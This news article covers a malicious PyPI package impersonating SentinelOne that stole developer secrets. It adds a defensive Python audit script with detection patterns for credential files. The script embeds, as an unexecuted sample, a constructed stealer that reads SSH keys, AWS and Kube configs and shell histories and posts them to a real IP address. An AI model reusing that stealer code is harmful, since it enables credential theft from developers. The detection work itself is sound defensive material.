2022-12-20

Criminals posing as a well-known cybersecurity firm have been caught trying to steal data from software developers, researchers have discovered.

ReversingLabs researchers recently discovered a malicious Python package on PyPI called "SentinelOne". Named after the well-known US cybersecurity company, the package purports to be a legitimate client SDK that gives easy access to the SentinelOne API from another project.

However, the package also ships "api.py" files that hold the malicious code, which collects sensitive developer data and exfiltrates it to a third-party IP address (54.254.189.27).

Chasing auth tokens and API keys

The stolen data includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration files, Kube configuration files, and more. According to the researchers, these files typically hold auth tokens, secrets, and API keys, which would give the threat actors access to the victims' cloud services and server endpoints.
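A package that reads exactly those secret stores and then talks to the network is the signature worth checking for before installing an unfamiliar SDK. The following is an added example, not code from ReversingLabs or from the malicious package itself: a small pre-install audit that walks an unpacked package directory, flags source files that reference the credential locations listed above together with a network call or a hard-coded IP literal, and reports them. The sample package it builds in a temporary directory (a benign-looking client module next to an "api.py" that mimics the described behaviour) is constructed for the demo; the only indicator taken from the article is the list of targeted files and the 54.254.189.27 address, and the constructed stealer text is never executed.

```python
"""Pre-install audit for an unpacked PyPI package.

Added example, not the researchers' tooling or the malicious package's
code.  Flags .py files that reference developer secret stores AND either
make a network call or embed an IPv4 literal.  The sample package below is
constructed for the demo and is not the real upload.
"""
import re
import tempfile
from pathlib import Path

# Secret stores the article names as exfiltration targets.
SECRET_PATH_PATTERNS = {
    "shell history": re.compile(r"\.(?:bash|zsh)_history"),
    "ssh keys": re.compile(r"\.ssh/"),
    "git config": re.compile(r"\.gitconfig"),
    "hosts file": re.compile(r"/etc/hosts"),
    "aws config": re.compile(r"\.aws/"),
    "kube config": re.compile(r"\.kube/"),
}
# A dotted quad; version strings like 1.2.3.4 also match, so this is only a
# trigger for review, not proof of malice on its own.
IPV4_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
NETWORK_CALLS = re.compile(
    r"\b(?:requests\.(?:post|get|put)|urlopen|socket\.socket|http\.client)\b"
)


def audit_source(text: str) -> dict:
    """Return the indicators found in one source file."""
    ips = sorted(
        ip for ip in set(IPV4_LITERAL.findall(text))
        if all(int(octet) <= 255 for octet in ip.split("."))
    )
    secret_paths = sorted(
        name for name, rx in SECRET_PATH_PATTERNS.items() if rx.search(text)
    )
    network_calls = bool(NETWORK_CALLS.search(text))
    return {
        "secret_paths": secret_paths,
        "ip_literals": ips,
        "network_calls": network_calls,
        # Reading secrets is only suspicious when there is somewhere to send them.
        "suspicious": bool(secret_paths) and (network_calls or bool(ips)),
    }


def audit_package(root) -> dict:
    """Walk an unpacked package; map relative path -> findings for suspicious files."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.py")):
        findings = audit_source(path.read_text(encoding="utf-8", errors="replace"))
        if findings["suspicious"]:
            report[path.relative_to(root).as_posix()] = findings
    return report


# Constructed sample modules (hypothetical names), modelled on the article's
# description: a working-looking client plus an api.py that reads the
# targeted files and posts them to the reported IP.  Never executed here.
CONSTRUCTED_CLIENT = '''\
import requests

class Client:
    def __init__(self, base_url, token):
        self.base_url = base_url
        self.session = requests.Session()
        self.session.headers["Authorization"] = "ApiToken " + token

    def get_agents(self):
        return self.session.get(self.base_url + "/web/api/v2.1/agents").json()
'''

CONSTRUCTED_STEALER = '''\
import os, requests

TARGETS = ["~/.bash_history", "~/.zsh_history", "~/.ssh/id_rsa",
           "~/.gitconfig", "~/.aws/credentials", "~/.kube/config"]

def collect():
    return {t: open(os.path.expanduser(t)).read()
            for t in TARGETS if os.path.exists(os.path.expanduser(t))}

def send():
    requests.post("http://54.254.189.27/upload", json=collect())
'''


def build_constructed_package() -> Path:
    """Write the constructed sample package to a temp dir and return its root."""
    root = Path(tempfile.mkdtemp(prefix="pkg_audit_demo_"))
    pkg = root / "sentinelone_demo"
    pkg.mkdir()
    (pkg / "__init__.py").write_text("from .client import Client\n")
    (pkg / "client.py").write_text(CONSTRUCTED_CLIENT)
    (pkg / "api.py").write_text(CONSTRUCTED_STEALER)
    return root


if __name__ == "__main__":
    for rel_path, findings in audit_package(build_constructed_package()).items():
        print(rel_path, findings)
```

Against the constructed package only `sentinelone_demo/api.py` is reported: it references five of the six secret stores, embeds 54.254.189.27 and calls `requests.post`, while `client.py` is clean. The check is deliberately a heuristic for triage, not a verdict; obfuscated loaders or a real IP hidden behind DNS will evade it, which is why the finding should feed a manual read of the flagged file rather than a pass/fail gate.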

The worst part is that the package delivers the functionality developers expect. It is not a compromised legitimate project but a fresh upload that bundles working client code with the malicious code, so unsuspecting developers could adopt it and unknowingly become victims. The good news is that ReversingLabs confirmed the package's malicious intent and reported it to both SentinelOne and PyPI, after which it was removed from the repository.

In the days leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11 and was updated 20 times in less than 10 days.

Among the changes in those updates, the researchers found, was a fix for a bug that had prevented the data collection from working on Linux systems.

It is hard to say whether anyone fell for the scam, the researchers concluded, as there is no evidence that the package was used in an actual attack. Still, its published versions were downloaded more than 1,000 times in total.

Via: BleepingComputer